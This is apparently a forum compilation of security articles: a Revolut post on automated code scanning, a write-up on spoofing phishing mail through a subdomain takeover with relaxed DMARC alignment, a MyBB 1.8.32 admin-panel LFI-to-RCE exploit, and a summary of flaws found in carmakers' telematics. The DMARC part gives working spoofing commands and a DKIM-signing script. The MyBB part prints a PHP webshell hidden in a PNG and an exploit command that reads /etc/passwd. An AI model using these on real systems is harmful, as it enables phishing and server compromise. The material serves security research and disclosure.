As we're continuously growing and extending our product offerings, we face many technological challenges. These challenges are solved by our engineers, and this results in many features, changes and updates being developed and successfully delivered to our customers. However, with the development of new features come many security challenges that are faced by the internal Application Security team. This lovely bunch is responsible for the security assurance of every new feature developed by our engineers. To provide the highest level of security assurance to our products, we've implemented a number of processes placed in different stages of the Software Development Life Cycle (SDLC), including automated scans in our CI/CD pipelines. However, it wouldn't be possible to manually and efficiently triage every security finding produced by automated scanners. In July 2022, there were nearly 39,000 commits created by over 900 authors! To address this challenge, we developed Security Drone. In this article, we'd like to share with you our approach to providing the highest security assurance in fast CI/CD environments.

Challenges faced by Revolut

The classic approach to security testing requires the security teams to perform a manual review of any developed features, with the help of automated security scans. Traditionally, this work was executed on a risk-and-priority basis, and that need was stretching the team beyond its capacity. Additionally, the team had to cope with the numerous CI pipelines across the company. This approach wasn't a viable solution in terms of scaling, quality and coverage. Some of you may have an idea of the security challenges faced in a fast CI/CD environment.
If not, let us make a little recap of the challenges we've been facing:

- Software changes are constantly increasing
- New changes are integrated and deployed every day
- Engineers tend to prioritise the development of functionalities over security
- The internal application security team can't be big enough to have a dedicated security engineer for each project — both internal and external
- AppSec teams nowadays must work on automating the work they were doing 10 years ago in a manual way
- With more tools integrated into the pipelines, the timeline of each job increases, which negatively affects the development experience
- And many more challenges you probably observe in your companies too!

First solution — The classic approach to CI/CD pipeline scans

Our first solution, and the most simplistic one, was to onboard automated security scanners like Static Application Security Testing (SAST) and Software Composition Analysis (SCA) and review the findings within the AppSec team. It worked, but we started facing another problem: the company was growing, and from an initial handful of projects, we now had to deal with thousands of projects and non-stop builds at any given time. As a result, we had to manage hundreds of CI pipelines used for security purposes. Let's see some numbers of what we observed in our environment. Every 24 hours of a working day brought about 950 new pull requests (PRs), with nearly 1.85 commits per PR. During working hours, automated scans were executed 3–4 times per minute, on average, against various projects. The chart below presents how many security scans were performed on the 14th of July 2022, in 30-minute buckets.

Number of automated security scans per 30 minutes

With those numbers, we faced another challenge — triaging all of the security findings. These scans produced a high number of false positive vulnerabilities that had to be manually triaged by the security team.
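The 3–4 scans per minute follow directly from the PR volume quoted above. A rough back-of-the-envelope calculation, assuming the activity is spread over an eight-hour working day (that window is my assumption, not stated in the article):

```python
# Back-of-the-envelope: ~950 PRs/day at ~1.85 commits per PR, spread over
# an assumed 8-hour working day, matches the reported 3-4 scans per minute.
prs_per_day = 950
commits_per_pr = 1.85
working_minutes = 8 * 60

scans_per_minute = prs_per_day * commits_per_pr / working_minutes
print(round(scans_per_minute, 1))  # ≈ 3.7
```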
Initially, we didn’t think scanning every software change was the way to go, we should only be scanning the changes intended for the Production environment. We did the analysis and concluded that about 81% of the commits had a final destination to the main branch, and we were facing the same challenge. Our scanners would be completing at least three successful security scans on a software change every minute! This amount of scans would still result in a potentially high number of false positives, which had to be reviewed and triaged within a certain period of time. Not only that, but more and more security scanners within CI/CD pipelines would affect their timelines negatively. So we thought: ‘Do we really have to go in this direction? Do we have to manage all of the pipelines for various projects and triage all of the identified security issues within the AppSec Team? Do we have to affect CI/CD timelines negatively?’ At this point, we had a lot of doubts and questions about this approach. In the Application Security team we understood this approach wouldn’t be scalable in a fast-paced environment such as Revolut. We could implement some small improvements to address each of these questions. However, those improvements could just delay bigger problems for later on. At this point, we decided to go in a slightly different direction, having a security-shift-left approach in our minds. Security static analysis tools can easily be shifted left to an earlier phase in the SDLC, since these types of tools don’t require the application to be running. Second solution — Security Drone You may expect as a second solution something extremely smart and well-designed. So did we. But it didn’t take long for us to take an agile approach with lean implementations. We also started security shifting left and communicating security issues to developers as early as possible, before going into testing or production environments. 
At the beginning of our MVP solution, we decided to scan code changes during the pull request phase. In our opinion, it was a natural step for engineers to propose software changes for their colleagues to approve. At this point, we also decided to communicate all of the identified security findings to developers. The scanner's results could be taken into account during code review, which is an integral part of the development process at Revolut. It should be noted that our scanner was triggered when a new PR was created or code was updated in an already existing PR. We also decided to place Security Drone in a Kubernetes cluster to scan the code independently from CI/CD pipelines and to have centralised scan management. In many cases, the independent scans were able to deliver results to developers before the CI jobs had even finished. Initially, we implemented only a SAST scanner, to make the process as fast as possible and to quickly deliver results to developers. We aimed to provide results in under 300 seconds. We carefully researched available SAST solutions to choose the most suitable one for our needs. It had to be fast, well documented, and allow us to write custom rules to identify potential security issues specific to our environment. Last but not least, we wanted to achieve the lowest possible false positive rate, both to avoid producing irrelevant findings that would add manual triage work, and, since we had decided to surface all identified security findings to developers on the PR page, to make sure not to affect their experience negatively with a pile of irrelevant findings to review. Later, we started implementing new scanners in Security Drone, such as Software Composition Analysis and Infrastructure as Code, to bring more value to the automated security testing. Security Drone's high-level architecture is presented below.
Architecture of Security Drone

Currently, we scan all pull requests created by Revolut engineers. In July, Security Drone performed over 39,000 scans. The median scanning time is below 112 seconds and the average is below 110 seconds. Initially, we used 19 SAST and 63 IaC rules. Only high and critical SCA issues were directly reported to our developers. Our first MVP was released in Q1 2022, then extended and adjusted over the following months. Security Drone has now been operating in production for the last eight months without issues on both the operational and engineering distribution sides.

We use the following tools in Security Drone:

- Semgrep — Static Application Security Testing
- Snyk Open Source — Software Composition Analysis
- Checkov — Infrastructure as Code

What have we achieved with Security Drone?

- We have adopted a shift-left approach to security to identify and communicate security findings earlier in the SDLC, before they reach testing or production environments
- Security issues can be fixed before going into production, and as a result, they don't have to be manually triaged by AppSec team members
- Only merged security issues are reported to the AppSec team to triage and loop into the vulnerability lifecycle process
- We lowered the false positive rate by carefully choosing the SAST solution and continually tuning rules. We were able to achieve a ~3.8% FP rate!
- Our centrally managed scanner currently scans 100% of the code at Revolut, which saves us hundreds of hours of manual reviews. Here are some numbers from the last 24 hours:
  - Nearly 1,700 pull requests were scanned
  - Over 3,900 scans associated with the above PRs were performed
- Ability to find new vulnerabilities in other applications based on patterns
- The scans are fast and don't disrupt the developer experience.
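As an illustrative sketch of how several scanner types can be fanned out in parallel for a single pull request (this is an invented toy, not Security Drone's actual code; the scanner functions are stand-ins for real Semgrep/Snyk/Checkov invocations):

```python
# Toy orchestrator: run one function per scanner type concurrently and
# collect their findings. A real deployment would shell out to the tools
# (semgrep, snyk, checkov) and post results back to the PR.
from concurrent.futures import ThreadPoolExecutor

def sast_scan(repo):
    return {"scanner": "sast", "findings": [f"{repo}: hardcoded secret"]}

def iac_scan(repo):
    return {"scanner": "iac", "findings": []}

def sca_scan(repo):
    return {"scanner": "sca", "findings": [f"{repo}: vulnerable dependency"]}

def scan_pull_request(repo):
    scanners = [sast_scan, iac_scan, sca_scan]
    with ThreadPoolExecutor(max_workers=len(scanners)) as pool:
        results = list(pool.map(lambda scan: scan(repo), scanners))
    # Only surface scanners that produced findings; clean results stay quiet.
    return [r for r in results if r["findings"]]

print(scan_pull_request("billing-service"))
```

Running the scanners concurrently means the slowest one (SCA in the figures below) bounds the total PR feedback time, rather than the sum of all three.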
They’re executed in parallel and scanning times are presented below: • Median scanning time for SAST is 11 seconds • Median scanning time for IaC is 22 seconds • Median scanning time for SCA is 101 seconds Increased security awareness and continuous learning amongst engineers. They’re also aware of the direction that AppSec is moving. What is next? Security Drone will always be under development as new technologies are emerging and improvements to the development experience can be made. On our roadmap we have various points, some of which include: Ability to flag findings as a false positive in a developer-friendly way Incremental SAST scans — scan only code changes in PRs Integration of more security scanners and the development of more SAST/IaC rules Keep your eyes peeled for our next blogpost around Application Security in Revolut, as we may share more interesting tools and guides on how we solve the challenges we face every day. Credits Credits go to every Revolut AppSec engineer involved in the design and development of Security Drone, especially: Arsalan Ghazi, Krzysztof Pranczk, Pedro Moura, Roger Norton Sursa: https://medium.com/revolut/security-drone-scaling-continuous-security-at-revolut-862bcd55956e
-
DMARC Identifier Alignment: relax, don't do it, when you want to go to it

Jan 25, 2023 in HACKING • MAILSECURITY dmarc spf dkim 9 min read

From subdomain takeover to phishing mails

TL;DR: if you have a subdomain takeover for a given domain, and default DMARC alignment settings, you can create emails that pass SPF and DMARC for phishing purposes. DKIM, however, cannot be passed for the domain, but a trick is possible to make emails look more trustworthy.

Introduction

I like Mozilla's definition of a subdomain takeover:

A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. This can happen because either a virtual host hasn't been published yet or a virtual host has been removed. An attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it.

The usual impact of the above is phishing or cookie theft via impersonated web pages. Subdomain takeovers have consequences for mail security too, and not just on the vulnerable subdomain but also on the organizational one. This article is a practical example of how to craft phishing emails from a subdomain takeover.

Prerequisites

Vulnerable subdomain

One needs a subdomain takeover where the target of a DNS record is fully under their control. E.g. for a vulnerable domain of altf8.fr (I own it), a DNS CNAME record as follows is needed:

```
takeover IN CNAME sub.dangling.com.
```

```
$ dig +short takeover.altf8.fr
sub.dangling.com.
```

where dangling.com is not registered (anymore). One can then claim the dangling.com domain and control its DNS zone, hence making sub.dangling.com point to a controlled server. The above is important, as a subdomain takeover pointing to third-party websites such as GitHub etc.
will not allow an attacker control over a DNS zone or a server, which is crucial for the technique described here to work.

"Relaxed" DMARC configuration

The DMARC configuration of the target domain needs to allow the "relaxed" mode of SPF Authenticated Identifiers and/or DKIM Authenticated Identifiers. This, though, is the default behaviour if the aspf or adkim settings have not been set. Hence, the following DMARC policy is vulnerable:

```
$ dig +short txt _dmarc.altf8.fr
"v=DMARC1; p=reject; sp=reject"
```

So would be this one:

```
$ dig +short txt _dmarc.altf8.fr
"v=DMARC1; p=reject; sp=reject; aspf=r; adkim=r"
```

But that one is not:

```
$ dig +short txt _dmarc.altf8.fr
"v=DMARC1; p=reject; sp=reject; aspf=s; adkim=s"
```

For the following demonstration, the first policy above was in use.

Preparation

Let's set some DNS records on the dangling.com domain that we registered and control. The subdomain takeover:

```
sub IN CNAME server.dangling.com
```

server.dangling.com is identified by:

```
server IN A 1.2.3.4
```

An MX record for the controlled server:

```
target IN MX 10 server.dangling.com
```

So now, takeover.altf8.fr points to the controlled server, which is allowed to send mails for sub.dangling.com:

```
$ dig +short takeover.altf8.fr
sub.dangling.com.
1.2.3.4
$ dig +short mx takeover.altf8.fr
sub.dangling.com.
10 server.dangling.com.
```

Passing SPF

The SPF Authenticated Identifiers definition states:

In relaxed mode, the SPF-authenticated domain and RFC5322.From domain must have the same Organizational Domain. In strict mode, only an exact DNS domain match is considered to produce Identifier Alignment.

The "SPF-authenticated domain" is taken from the SMTP MAIL FROM command. The From domain is taken from the MIME header with the same name. When a mail is received, the MAIL FROM domain value is extracted and the corresponding SPF record is requested, then used. This is the behaviour of most mail agents.
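The relaxed-versus-strict alignment check described above can be approximated in a few lines of Python. This is only a sketch: real implementations derive the organizational domain from the Public Suffix List, whereas this toy version simply takes the last two labels:

```python
# Toy DMARC identifier alignment check. Relaxed mode compares organizational
# domains; strict mode requires an exact FQDN match. A real implementation
# would consult the Public Suffix List instead of taking the last two labels.
def org_domain(domain):
    return ".".join(domain.lower().split(".")[-2:])

def aligned(authenticated_domain, from_domain, mode="r"):
    if mode == "s":                      # strict: exact match only
        return authenticated_domain.lower() == from_domain.lower()
    return org_domain(authenticated_domain) == org_domain(from_domain)

print(aligned("takeover.altf8.fr", "altf8.fr"))        # relaxed: True
print(aligned("takeover.altf8.fr", "altf8.fr", "s"))   # strict: False
```

With relaxed alignment, any subdomain of the organizational domain (including a taken-over one) aligns with the From domain, which is exactly what the attack below abuses.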
If relaxed mode is enabled, one can send a subdomain in MAIL FROM and a domain in From with the same organizational domain, and SPF will still pass:

For example, if a message passes an SPF check with an RFC5321.MailFrom domain of "cbg.bounces.altf8.fr", and the address portion of the RFC5322.From field contains "payments@altf8.fr", the Authenticated RFC5321.MailFrom domain identifier and the RFC5322.From domain are considered to be "in alignment" in relaxed mode, but not in strict mode.

In our example, we control the SPF record for sub.dangling.com. We set it to:

```
sub IN TXT "v=spf1 mx -all"
```

Which means "all IPs associated with MX records in the sub.dangling.com domain will be authorized to send mails". Because of the subdomain takeover and how DNS resolution works, we now have an SPF record for takeover.altf8.fr:

```
$ dig +short txt takeover.altf8.fr | grep spf
"v=spf1 mx -all"
```

And because we set server.dangling.com as a valid MX, we can now send emails from it. We can do that on the command line of server.dangling.com (altf8.fr uses Microsoft 365, hence the outlook.com SMTP server below):

```
$ curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt
[...]
```
```
* TCP_NODELAY set
* Expire in 149967 ms for 3 (transfer 0x55aad3f5a0f0)
* Expire in 200 ms for 4 (transfer 0x55aad3f5a0f0)
* Connected to altf8-fr.mail.protection.outlook.com (104.47.24.36) port 25 (#0)
< 220 PR2FRA01FT014.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 23 Jan 2023 15:55:16 +0000
> EHLO mail.txt
< 250-PR2FRA01FT014.mail.protection.outlook.com Hello [1.2.3.4]
< 250-SIZE 157286400
< 250-PIPELINING
< 250-DSN
< 250-ENHANCEDSTATUSCODES
< 250-STARTTLS
< 250-8BITMIME
< 250-BINARYMIME
< 250-CHUNKING
< 250 SMTPUTF8
> MAIL FROM:<ceo@takeover.altf8.fr> SIZE=140
< 250 2.1.0 Sender OK
> RCPT TO:<jbencteux@altf8.fr>
< 250 2.1.5 Recipient OK
> DATA
< 354 Start mail input; end with <CRLF>.<CRLF>
} [140 bytes data]
* We are completely uploaded and fine
100   140    0     0  100   140      0    185 --:--:-- --:--:-- --:--:--   185
< 250 2.6.0 <b427960e-4306-42a2-9121-fefaaa105def@PR2FRA01FT014.eop-fra01.prod.protection.outlook.com> [InternalId=68521908309720, Hostname=MRZP264MB2425.FRAP264.PROD.OUTLOOK.COM] 8276 bytes in 0.036, 220.364 KB/sec Queued mail for delivery
100   140    0     0  100   140      0    185 --:--:-- --:--:-- --:--:--   185
* Connection #0 to host altf8-fr.mail.protection.outlook.com left intact
```

This is the content of mail.txt:

```
From: ceo@altf8.fr
To: jbencteux@altf8.fr
Subject: You are fired

Hi Jeff,

Sorry to tell you this way, but you're out.

Best regards,
CEO
```

Note the difference of sender in --mail-from and in the From of mail.txt, which is what the RFC states as allowed when in relaxed SPF alignment.
The email is received in the Outlook inbox of jbencteux@altf8.fr, passing the spam filters. Its MIME headers state that SPF passed:

```
Received-SPF: Pass (protection.outlook.com: domain of takeover.altf8.fr designates 1.2.3.4 as permitted sender)
```

Note that DMARC passes as well:

```
Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=none (message not signed) header.d=none;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100
```

This is because if no DKIM is present (dkim=none) but SPF passes, then DMARC passes. This is a by-design property of DMARC. OK, cool, but the mail is not cryptographically signed, and other mail agents might put it in the spam folder for lack of a signature. Let's see if we can get DKIM working.

(Kind of) Passing DKIM

In a similar fashion to the SPF Authenticated Identifiers, there are DKIM Authenticated Identifiers:

In relaxed mode, the Organizational Domains of both the [DKIM]-authenticated signing domain (taken from the value of the "d=" tag in the signature) and that of the RFC5322.From domain must be equal if the identifiers are to be considered aligned. In strict mode, only an exact match between both of the Fully Qualified Domain Names (FQDNs) is considered to produce Identifier Alignment.

Which means that if DMARC contains adkim=r (or no adkim, as the r value is the default one), there could be a d=takeover.altf8.fr in the DKIM signature and a From sender ending in @altf8.fr, and DKIM would still pass. Let's try that.
Generate a private key for DKIM signing on server.dangling.com:

```
$ openssl genrsa -out dkim_priv.pem 2048
```

Get the corresponding public key in base64:

```
$ openssl rsa -in dkim_priv.pem -pubout -outform der 2>/dev/null | openssl base64 -A
Ayw[...]zkwA
```

Construct and publish a DKIM record with the obtained public key in our dangling.com DNS zone (s1 is taken as an arbitrary selector):

```
s1._domainkey IN TXT "v=DKIM1; k=rsa; p=Ayw[...]zkwA"
```

```
$ dig +short txt s1._domainkey.sub.dangling.com
"v=DKIM1; k=rsa; p=Ayw[...]zkwA"
```

Sign a mail with the private key using the following Python script based on dkimpy:

```python
import dkim

mail = open("mail.txt", "rb").read()
selector = b"s1"
domain = b"takeover.altf8.fr"
privkey = open("dkim_priv.pem", "rb").read()

signature = dkim.sign(mail, selector, domain, privkey)
print(signature.decode("utf-8"))
```

It gives the following signature, which we add to mail.txt:

```
$ ./dkim_sign.py
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=takeover.altf8.fr;
 i=@takeover.altf8.fr; q=dns/txt; s=s1; t=1674566236;
 h=from : to : subject : from;
 bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=;
 b=eV4zAv9pVlDFmFN3DIYBX+hSRq/t4wyXCHbuyEB7GmWha3O8n1rxSyzyn1j15OREU
 uy6erbTUck2[...]3YxVk/ejgidpedmYoSnl8VChsmXZFsmMeMuuujALo4H1iIG
 8EhOesBGxeylmHZI5hGapmzReVyjTyyvoQQP9ymRRAT0uyV3Dej+cxDZ7AVfC7fdzW
 YFlcH69vbTryw==
```

We then send the signed mail:

```
$ curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt
```

And the result of the email authentication is as such:

```
Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=fail (no key for signature) header.d=takeover.altf8.fr;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100
```

It fails because the mail agent tries to get a DKIM public key DNS record for s1._domainkey.takeover.altf8.fr, and that resolves to… nothing.
It does not automatically point to s1._domainkey.sub.dangling.com, so the DNS response is empty, hence the "no key for signature". Which means (AFAIK) there is no valid altf8.fr domain DKIM signature that can be generated from a subdomain takeover. One would need control over *.altf8.fr to make that possible. However, as a hackish way of improving how the mail looks, it is still possible to sign it for another domain to try to pass more antispam defences, even if that domain is not our targeted altf8.fr domain (marketing platforms sign mails for other domains all the time). We can take the subdomain sub.dangling.com as an example. If we reuse our script to sign the mail with sub.dangling.com:

```
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=sub.dangling.com;
 i=@sub.dangling.com; q=dns/txt; s=s1; t=1674566236;
 h=from : to : subject : from;
 bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=;
 b=gdRYJ8lajpHd4DZfbqOLNtvaqH+tSsbyTM2o3Px3EuTEcAFO6wTe+eLKzQWAiZ6CiNg0l
 udHoSAd9XJfkjBuP[...]V4Hlg02qSoNmNZOiA/Oj3g53eTf+uoNQdAHT/qjEVBeAN0S
 hzrmGnN8B8cynWNSIVOw9Pwmqj2nmPTzEYDhJOE7aIiIrlJz59/rhQFUBYrA==
```

```
$ curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt
```

We then get a passing DKIM:

```
Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=pass (signature was verified) header.d=sub.dangling.com;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100
```

While this will not fool spam filters that check that the signing domain is the sender domain (which they should), it is sometimes enough for the mail to be signed by any domain to pass misconfigured defences. Our mail is now:

- Passing SPF
- Passing DMARC
- Passing DKIM, but not for the sender's domain

This can trick a lot of mail clients into believing this email is legit, including Outlook, the one tested for this example.
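A quick way to audit a domain for this issue is to look at the aspf/adkim tags of its DMARC record, which default to relaxed ("r") when absent. A toy sketch of such a check (not a full DMARC parser; record strings are the examples from this article):

```python
# Toy check: parse a DMARC TXT record and report its alignment modes.
# aspf/adkim default to "r" (relaxed) when the tags are absent, which is
# exactly the configuration this article's trick relies on.
def alignment_modes(dmarc_record):
    tags = dict(
        part.strip().split("=", 1)
        for part in dmarc_record.strip("; ").split(";")
        if "=" in part
    )
    return tags.get("aspf", "r"), tags.get("adkim", "r")

for record in ("v=DMARC1; p=reject; sp=reject",
               "v=DMARC1; p=reject; sp=reject; aspf=s; adkim=s"):
    aspf, adkim = alignment_modes(record)
    mode = "relaxed" if "r" in (aspf, adkim) else "strict"
    print(record, "->", mode)
```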
Conclusion

While the prerequisites for this type of attack are high, it is not unlikely that attackers will use subdomain takeovers in order to forge convincing phishing emails. This could also be a good tactic from a red team point of view, as it minimizes the interaction between the targeted domain and the operator (only a few DNS requests are needed) until the final phishing mail is sent. To avoid and mitigate this issue, I suggest:

- Regularly checking your DNS for unused records and removing them to avoid subdomain takeovers
- If the DMARC relaxed modes are not needed, setting the following in your DMARC DNS records: aspf=s; adkim=s;

References

- RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email, Version 1 (rfc-editor.org)
- RFC 6376: DomainKeys Identified Mail (DKIM) Signatures (rfc-editor.org)
- RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC) (rfc-editor.org)
- How to create a DKIM record with OpenSSL - Mailhardener knowledge base
- Quickstart to DKIM Sign Email with Python – Russell Ballestrini
- Frankie Goes To Hollywood - Relax (Official Video) - YouTube

Sursa: https://www.bencteux.fr/posts/dmarc_relax/
-
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)

A detailed analysis of MyBB 1.8.32 (code audit + LFI-to-RCE reproduction).

(1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. Change the Avatar Upload Path to /inc to bypass the blacklisted upload directory.

(2). After doing that, we are able to chain an "admin avatar upload" on the page http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar with an LFI on the "Edit Language Variables" page http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english.

(3). These chained bugs lead to authenticated RCE.

(note). The user must have rights to add or update settings and to update the avatar. This was tested on MyBB 1.8.32.

Exp Usage:

First, choose a PNG file smaller than 1 KB, then append a simple PHP backdoor to it using the following commands:

```
mac@xxx-2 php-backdoor % cat simple-backdoor.php
<?php
if(isset($_REQUEST['cmd'])){
    echo "<getshell success>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "<getshell success>";
    phpinfo();
}
?>
mac@xxx-2 php-backdoor % ls
simple-backdoor.php	test.png
mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png
mac@xxx-2 php-backdoor % file test.png
test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
```

Finally, run the exploit script to get RCE. Enjoy the shell...

```
python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd"
```

reference

- mybb 1.8.32 RCE in admin panel report
- MyBB
- MyBB github
- A MyBB code-audit write-up (记一次mybb代码审计)
- mybb bugs in exploit database

Sursa: https://github.com/FDlucifer/mybb_1832_LFI_RCE
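The `cat simple-backdoor.php >> test.png` polyglot step from the usage section can equally be sketched in a few lines of Python. This is only an illustration of the trick: the file keeps its PNG magic bytes (so naive image checks still pass) while carrying PHP at the end:

```python
# Append a PHP payload to a PNG so the result still starts with the PNG
# magic bytes while carrying executable PHP at the end of the file.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def make_polyglot(png_bytes, php_payload):
    if not png_bytes.startswith(PNG_MAGIC):
        raise ValueError("not a PNG file")
    return png_bytes + php_payload

png = PNG_MAGIC + b"...minimal image data..."
payload = b"<?php system($_REQUEST['cmd']); ?>"
polyglot = make_polyglot(png, payload)
print(polyglot.startswith(PNG_MAGIC), payload in polyglot)  # True True
```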
-
I agree that there are many methods, including "full frame" ones or even fake ATMs: https://krebsonsecurity.com/2013/12/the-biggest-skimmers-of-all-fake-atms/ I do the basics of what can be done; in any case I use several accounts, so even if someone captures my card data, including the PIN, the damage is limited.
-
I can only recommend IPBoard, and advise you to stay away from vBulletin. The IPBoard license on RST is "standalone", meaning I handle the infrastructure (together with Zatarra) on a dedicated server, and the license was simply activated from the Admin CP. The price depends on the auxiliary services you choose; you can find details here: https://invisioncommunity.com/buy/self-hosted/ PS: It is not particularly complicated to install and configure; it requires the classic Linux + PHP/MariaDB/Apache (or similar) knowledge.
-
How do hackers steal my data from the magnetic stripe?
Nytro replied to viano1's topic in Tutoriale in romana
No, because the PIN is not stored on the magnetic stripe. But online payments can still be made. 3D Secure helps partially; it is only useful if the sites where someone could shop online (or the payment processors) actually implement 3D Secure as well, which rarely happens with the Americans (and their sites). -
It can steal your card data (depending on the skimmer, it may also capture the PIN). I always tug on the card-insert slot and the keypad, and I hold my wallet over the keypad when entering the PIN, in case there is a camera. Important, I think I've said this here before: if you find a skimmer, put it back and walk away. Then call the police, the bank, or whoever you want. I got this advice from someone at a bank who handles protecting ATMs from skimmers. The idea was simple: a skimmer device is very expensive, and the lowlifes who own one are capable of cutting you just so they don't lose it.
-
How do hackers steal my data from the magnetic stripe?
Nytro replied to viano1's topic in Tutoriale in romana
The card data is stored on the magnetic stripe; copying it is done with a swipe (passing the card through that strip reader). In our country I have never in my life used this method; I have only used it in the US. -
I haven't heard bad things about them.
-
It's fairly normal; a ton of junk comes in, quite a lot of duplicates. The number looks OK.
-
Oh, nice, I thought the service no longer worked.
-
Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

January 3, 2023 samwcyo

During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try to) take a break from our usual computer work. While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn't resist poking at the scooter's mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight.

When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in trying to find more ways to make more things honk. We brainstormed for a while, and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality. If an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems used, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely.

At this point, we started a group chat and all began to work with the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports them.
Findings Summary

During our engagement, we found the following vulnerabilities in the companies listed below:

Kia, Honda, Infiniti, Nissan, Acura

- Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number
- Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address)
- Ability to lock users out of remotely managing their vehicle, change ownership
- For Kias specifically, we could remotely access the 360-view camera and view live images from the car

Mercedes-Benz

- Access to hundreds of mission-critical internal applications via improperly configured SSO, including:
  - Multiple Github instances behind SSO
  - Company-wide internal chat tool, ability to join nearly any channel
  - SonarQube, Jenkins, misc. build servers
  - Internal cloud deployment services for managing AWS instances
  - Internal vehicle-related APIs
- Remote Code Execution on multiple systems
- Memory leaks leading to employee/customer PII disclosure, account access

Hyundai, Genesis

- Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim email address
- Fully remote account takeover and PII disclosure via victim email address (name, phone number, email address, physical address)
- Ability to lock users out of remotely managing their vehicle, change ownership

BMW, Rolls Royce

- Company-wide core SSO vulnerabilities which allowed us to access any employee application as any employee; this allowed us to:
  - Access internal dealer portals where you can query any VIN number to retrieve sales documents for BMW
  - Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships

Ferrari

- Full zero-interaction account takeover for any Ferrari customer account
- IDOR to access all Ferrari customer records
- Lack of access control allowing an attacker to create, modify, delete employee "back office" administrator user accounts and all user accounts with capabilities to modify Ferrari-owned web pages through the CMS system
- Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and secrets associated with them (authorization headers)

Spireon

- Multiple vulnerabilities, including:
  - Full administrator access to a company-wide administration panel with ability to send arbitrary commands to an estimated 15.5 million vehicles (unlock, start engine, disable starter, etc.), read any device location, and flash/update device firmware
  - Remote code execution on core systems for managing user accounts, devices, and fleets; ability to access and manage all data across all of Spireon
  - Ability to fully take over any fleet (this would've allowed us to track & shut off starters for police, ambulances, and law enforcement vehicles for a number of different large cities and dispatch commands to those vehicles, e.g. "navigate to this location")
  - Full administrative access to all Spireon products, including the following:
    - GoldStar - https://www.spireon.com/products/goldstar/
    - LoJack - https://www.spireon.com/products/goldstar/lojackgo/
    - FleetLocate - https://www.spireon.com/products/fleetlocate-for-fleet-managers/
    - NSpire - https://www.spireon.com/spireon-nspire-platform/
    - Trailer & Asset - https://www.spireon.com/solutions/trailer-asset-managers/
- In total, there were:
  - 15.5 million devices (mostly vehicles)
  - 1.2 million user accounts (end user accounts, fleet managers, etc.)

Ford

- Full memory disclosure on the production vehicle telematics API, disclosing customer PII and access tokens for tracking and executing commands on vehicles
- Discloses configuration credentials used for internal services related to telematics
- Ability to authenticate into customer accounts and access all PII and perform actions against vehicles
- Customer account takeover via improper URL parsing, allowing an attacker to completely access a victim account, including the vehicle portal

Reviver

- Full super administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could perform the following:
  - Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text)
  - Update any vehicle status to "STOLEN" which updates the license plate and informs authorities
  - Access all user records, including what vehicles people owned, their physical address, phone number, and email address
  - Access the fleet management functionality for any company, locate and manage all vehicles in a fleet

Porsche

- Ability to retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle telematics service

Toyota

- IDOR on Toyota Financial that discloses the name, phone number, email address, and loan status of any Toyota Financial customers

Jaguar, Land Rover

- User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information

SiriusXM

- Leaked AWS keys with full organizational read/write S3 access, ability to retrieve all files including (what appeared to be) user databases, source code, and config files for Sirius

Vulnerability Writeups

